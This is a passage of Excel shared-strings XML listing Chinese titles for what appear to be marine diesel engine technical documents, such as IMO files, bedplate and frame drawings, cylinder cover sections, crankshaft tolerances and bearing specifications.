      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术文件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>技术文件</t>
    </r>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支持文档</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>IMO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户技术文件手册</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应变测试点</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>材料表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气温度和排气总量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主、辅机容量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>码头试车</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>&amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试航确认</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧推力力距</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部力和力距描述</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>S50L</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压喷射设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>S35P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重心</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>U35P</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重心</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加热系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷射体备件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截留装备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机剖面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座加工图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座中、前部焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座前、中部加工图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座中、后部加工图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>LB/DLH</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层工艺</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承制造商</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座正视图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座铸铁楔块</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接程序规格概要</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接程序规格</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座机架热处理</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座上的调节螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后框架剖视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架截面图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅截面图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底层机架截面图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架中间焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱表面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架底部法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锡铝推力垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅铜推力垫片</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锡铝轴承制造商</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铅铜轴承制造商</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架顶部和凸轮轴侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架前侧和后侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架顶视图、侧视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架顶部和侧部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机出口回油箱进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带安全阀的盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体后端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体凸轮侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体排气侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖质量指导</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖下视图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸盖横截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖冷却孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖前部，底部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖燃油阀截面</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖下部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖截面详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖螺栓上紧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖变更</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴公差值</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形位公差</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造曲轴质量规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金轴承质量说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金曲柄销轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆火焰硬化说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>新机器活塞对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀间隙</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流孔塞布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座研磨机</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨机支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸简图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴孔直径</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴详情</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫片和凸轮升程技术数据</t>
    </r>
  </si>
  <si>
    <r>
